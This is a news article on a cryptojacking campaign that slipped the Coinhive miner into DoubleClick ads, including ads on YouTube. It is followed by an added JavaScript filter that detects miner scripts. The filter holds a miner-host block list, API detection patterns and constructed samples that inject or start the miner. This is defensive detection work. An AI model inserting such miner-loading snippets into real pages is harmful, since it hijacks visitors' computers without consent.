
Some enterprising crooks found a way to slip the Coinhive in-browser miner into ads served through Google's DoubleClick ad delivery platform.

Ads delivered this way made their way onto countless sites, and even onto one of Google's own properties: YouTube.

A Trend Micro report released today claims the crooks behind this campaign started abusing Google's DoubleClick platform to deliver the Coinhive in-browser miner around January 18 and significantly ramped up operations on January 23.

Coinhive detections in recent DoubleClick malvertising campaign

The chart above shows Coinhive detections for this malvertising campaign abusing Google DoubleClick.

Crooks deployed Coinhive on YouTube on January 23

The huge spike represents the moment when crooks decided to deliver the Coinhive-tainted ads on YouTube, the world's largest video hosting platform.

Reports immediately started appearing on Twitter [1, 2, 3, 4, 5, 6, 7, 8]. According to some of these reports, various antivirus products began detecting the Coinhive cryptojacker when users were visiting YouTube, a place where Coinhive would have never been able to load except via malicious JavaScript code hidden in one of the numerous ads displayed on video pages.

The Coinhive service appeared last September and has described itself as a website monetization service that could be employed as an alternative to classic online ads. The service uses JavaScript code to mine the Monero cryptocurrency inside the browser of a site's visitor.

Despite its good intentions, the service has been abused by crooks, who load the Coinhive in-browser miner on hacked sites, via malicious ads, inside desktop apps and game mods, and any other place that can run JavaScript code.

After Coinhive's initial success, various similar services have also launched online. These services operate by taking a small cut of the cryptocurrency website owners mine using their visitors' PCs.

This practice of secretly loading a JavaScript miner inside browsers and other JS-capable apps is being called cryptojacking or drive-by mining.

Currently, only ad blockers, no-JavaScript browser extensions, and antivirus products have proven effective at blocking cryptojacking scripts, because they inspect every script a page (or an ad iframe inside it) tries to load rather than trusting the site that embeds the ad.
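The following is an added example, written for this page and not code from the article, from Trend Micro or from Coinhive. It shows the kind of indicator-based script filter an ad blocker or no-JavaScript extension applies to each script a page or its ad frames load: a script is blocked if it is served from a known miner host, if it calls the miner's client API, or if its body references a miner host (the usual case for an ad creative that side-loads the miner). The miner host and API names are the ones the Coinhive client library publicly used at the time; every other URL and script body below is constructed for the demonstration.

```javascript
// Added example (editor's code, not the article's or Coinhive's): an
// indicator-based script filter in the style of ad blockers and no-JS
// extensions. Assumptions: the host "coinhive.com" and the constructors
// CoinHive.Anonymous / CoinHive.User are the public Coinhive library names of
// the time; all other hosts and script bodies here are constructed samples.

const MINER_HOSTS = ["coinhive.com"]; // extend with other miner services as needed

const MINER_API_PATTERNS = [
  /\bnew\s+CoinHive\.(Anonymous|User)\s*\(/, // miner instantiated with a site key
];

// Hostname of a script URL, resolved the way a page would resolve it, so
// protocol-relative ("//host/x.js") and relative URLs are handled too.
function scriptHost(url, pageOrigin = "https://example.test") {
  try {
    return new URL(url, pageOrigin).hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// Exact match or subdomain match on a dot boundary, so "notcoinhive.com"
// does not match "coinhive.com".
function hostMatches(host, blockedHost) {
  return host === blockedHost || host.endsWith("." + blockedHost);
}

// Decide whether a script should be blocked. `body` is the script text when
// the caller has it (an extension does; a pure network filter may not).
function classifyScript({ url, body = "" }) {
  const host = scriptHost(url);
  const hostHit = host && MINER_HOSTS.find((h) => hostMatches(host, h));
  if (hostHit) return { block: true, reason: "loaded from miner host " + hostHit };

  const apiHit = MINER_API_PATTERNS.find((re) => re.test(body));
  if (apiHit) return { block: true, reason: "calls miner API " + apiHit.source };

  // An ad creative is often clean itself and merely injects a second
  // <script> or opens a socket to the miner, so scan the body for hosts.
  for (const m of body.matchAll(/(?:https?:|wss?:)?\/\/([a-z0-9.-]+)/gi)) {
    const ref = m[1].toLowerCase();
    const refHit = MINER_HOSTS.find((h) => hostMatches(ref, h));
    if (refHit) return { block: true, reason: "references miner host " + refHit };
  }
  return { block: false, reason: "no miner indicator" };
}

// Constructed inputs (not captured from the campaign): an ad creative that
// side-loads the miner, the miner library itself, an inline miner start,
// a look-alike domain, and a benign player script.
const SAMPLES = {
  adCreative: {
    url: "https://ads.example-network.test/creative/42.js",
    body: 'var s=document.createElement("script");' +
          's.src="//coinhive.com/lib/coinhive.min.js";document.head.appendChild(s);',
  },
  minerLib: { url: "//coinhive.com/lib/coinhive.min.js" },
  inlineStart: {
    url: "inline",
    body: 'var miner = new CoinHive.Anonymous("SITE_KEY_PLACEHOLDER"); miner.start();',
  },
  lookalike: { url: "https://notcoinhive.com/app.js", body: "console.log('hi')" },
  benign: { url: "https://static.example.test/player.js", body: "var v=document.querySelector('video');" },
};

// Classify every sample; returns a name -> verdict map.
function runSamples() {
  const out = {};
  for (const [name, s] of Object.entries(SAMPLES)) out[name] = classifyScript(s);
  return out;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [name, r] of Object.entries(runSamples())) {
    console.log(`${name.padEnd(12)} ${r.block ? "BLOCK" : "allow"}  (${r.reason})`);
  }
}
```

The host check is applied to the script's own origin and to any origin it references, which is what lets a filter catch the miner when it arrives through an ad network rather than from the page itself; the dot-boundary match avoids false positives on look-alike domains. A real filter list is of course far longer and is updated as miner services change hosts, which is why the article notes that only actively maintained blockers and antivirus products have kept up.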
